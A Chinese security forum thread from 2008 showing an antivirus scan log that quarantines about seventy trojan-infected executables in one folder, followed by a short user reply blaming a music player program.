      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4893f92a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\b31.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488ff92b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\c19.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
      [NOTE]      A backup was created as '4897f929.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\c32.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4890f92b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\e1.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488cf929.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\e26.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4894f92a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\f34.exe
      [DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Popwin.bfu Backdoor server programs
      [NOTE]      A backup was created as '4892f92b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\g16.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
      [NOTE]      A backup was created as '4894f929.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\gd.exe
      [DETECTION] Is the Trojan horse TR/Drop.Age.31488.B
      [NOTE]      A backup was created as '488cf95c.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\google.exe
      [DETECTION] Is the Trojan horse TR/Hijacker.Gen
      [NOTE]      A backup was created as '48cdf967.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\h30.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488ef92c.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\i8.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488cf931.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\j17.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4895f92a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\j4.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488cf92d.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\l10.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488ef92a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\l18.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '4896f92a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\m13.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4891f92a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\m23.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4891f92b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\m28.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4896f92b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\m6.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488cf92f.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max.exe
    --> Object
      [1] Archive type: RSRC
      --> Object
          [DETECTION] Is the Trojan horse TR/Inject.HN.1
      [NOTE]      A backup was created as '48d6f95a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max1.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573ea3.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max10.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f95b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max11.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573ea4.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max12.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f95d.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max13.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573ea6.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max14.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f95f.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max15.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e98.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max16.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f961.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max17.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e9a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max18.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f963.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max19.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e9c.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max2.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f965.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max20.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e9e.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max21.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f967.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max22.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e90.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max23.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f969.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max24.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e92.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max25.exe
      [DETECTION] Is the Trojan horse TR/Onlinegames.apwa
      [NOTE]      A backup was created as '48d6f96b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max26.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnLi.aoiq.75
      [NOTE]      A backup was created as '48d6f95c.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max27.exe
      [DETECTION] Is the Trojan horse TR/PWS.Lmir.UMK
      [NOTE]      A backup was created as '4e573ea5.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max28.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
      [NOTE]      A backup was created as '48d6f95e.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max29.exe
    --> Object
      [1] Archive type: RSRC
      --> Object
          [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.amdt
      [DETECTION] Is the Trojan horse TR/Dldr.Delphi.Gen
      [NOTE]      A backup was created as '4e573ea7.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max3.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f950.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max30.exe
    --> Object
      [1] Archive type: RSRC
      --> Object
          [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.amdt
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573ea9.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max31.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '48d6f952.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max32.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '4e573e94.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max35.exe
      [DETECTION] Is the Trojan horse TR/ATRAPS.Gen
      [NOTE]      A backup was created as '48d6f96d.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max4.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e96.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max5.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f96f.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max6.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e88.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max7.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f971.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max8.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4e573e8a.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\max9.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '48d6f973.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\n14.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4892f92d.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\o15.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4893f92d.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\o24.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4892f92e.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\p21.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488ff92e.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\p35.exe
      [DETECTION] Is the Trojan horse TR/ATRAPS.Gen
      [NOTE]      A backup was created as '4893f92f.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\r2.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488cf92e.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\r7.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488cf933.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\t20.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488ef92e.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\u29.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
      [NOTE]      A backup was created as '4897f92e.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\u33.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
      [NOTE]      A backup was created as '4891f930.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\UUSEEM~1.EXE
      [DETECTION] Is the Trojan horse TR/Agent.4608.245
      [NOTE]      A backup was created as '48b1f952.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\v27.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4895f92f.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\x22.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
      [NOTE]      A backup was created as '4890f92f.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\x9.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488cf936.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\y5.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488cf932.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\z12.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '4890f92e.qua'  ( QUARANTINE )


End of the scan: 2008年6月23日  09:14
Used time: 00:07 min

The scan has been done completely.

      1 Scanning directories
     72 Files were scanned
     74 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
     72 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     -2 Files not concerned
      0 Archives were scanned
      0 Warnings
     72 Notes
csscz.love
发表于 2008-6-23 09:18:04 | 显示全部楼层
所以我是不用酷狗这流氓软件...
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-29 00:39 , Processed in 0.130223 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表